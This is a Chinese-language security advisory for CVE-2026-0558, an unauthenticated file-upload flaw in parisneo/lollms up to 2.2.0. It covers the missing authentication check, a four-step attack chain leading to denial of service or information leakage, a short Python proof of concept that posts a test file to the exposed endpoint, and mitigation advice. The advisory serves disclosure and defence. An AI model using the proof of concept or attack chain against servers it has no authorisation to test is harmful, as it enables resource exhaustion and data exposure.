CVE-2026-0558 CVSS 9.8 严重

CVE-2026-0558: parisneo/lollms未授权文件上传漏洞

披露日期: 2026-03-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-0558

漏洞类型

未授权文件上传

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

parisneo/lollms

漏洞概述

parisneo/lollms在2.2.0及之前的版本中存在严重安全漏洞。该漏洞允许未经身份验证的用户通过`/api/files/extract-text`端点上传并处理文件。由于该端点缺少身份验证依赖，攻击者可利用此漏洞导致资源耗尽型拒绝服务、信息泄露，并严重违反应用的安全策略。

技术细节

该漏洞的根本原因是parisneo/lollms在实现`/api/files/extract-text` API端点时，未能正确应用安全控制。代码中缺少关键的`Depends(get_current_active_user)`依赖注入，导致该端点绕过了应用程序强制执行的身份验证机制。与其他受保护的文件操作端点不同，攻击者无需任何用户凭证即可访问该接口。利用方式简单，攻击者只需向目标服务器发送包含文件的HTTP POST请求。服务器在处理文件提取文本的过程中，会消耗CPU和内存资源。通过上传大量大文件或特殊格式文件，攻击者可导致服务器资源耗尽（DoS），或利用文件处理逻辑读取敏感信息。

攻击链分析

STEP 1

侦察

攻击者识别出运行parisneo/lollms（版本<=2.2.0）的目标服务器，并确认端口开放。

STEP 2

漏洞利用

攻击者向`/api/files/extract-text`端点发送未经身份验证的HTTP POST请求，上传恶意或大体积文件。

STEP 3

载荷处理

服务器接收到文件后，由于缺少认证检查，直接调用后端逻辑进行文本提取和处理。

STEP 4

影响达成

服务器资源被耗尽导致拒绝服务（DoS），或处理过程中泄露敏感文件信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_poc(target_url):
    """
    PoC for CVE-2026-0558: Unauthenticated file upload
    """
    endpoint = f"{target_url}/api/files/extract-text"
    
    # Prepare a dummy file to upload
    files = {'file': ('test.txt', b'Test content for extraction')}
    
    try:
        # Send POST request without authentication headers
        response = requests.post(endpoint, files=files, timeout=10)
        
        if response.status_code == 200:
            print("[+] Vulnerability confirmed! File processed successfully.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    target = "http://127.0.0.1:9600" # Replace with actual target
    exploit_poc(target)

影响范围

parisneo/lollms <= 2.2.0

防御指南

临时缓解措施

建议立即检查并升级parisneo/lollms到包含补丁的最新版本。若暂时无法升级，应在应用层或网关层禁用或拦截对`/api/files/extract-text`路径的访问请求，或手动添加身份验证中间件以阻断未授权访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表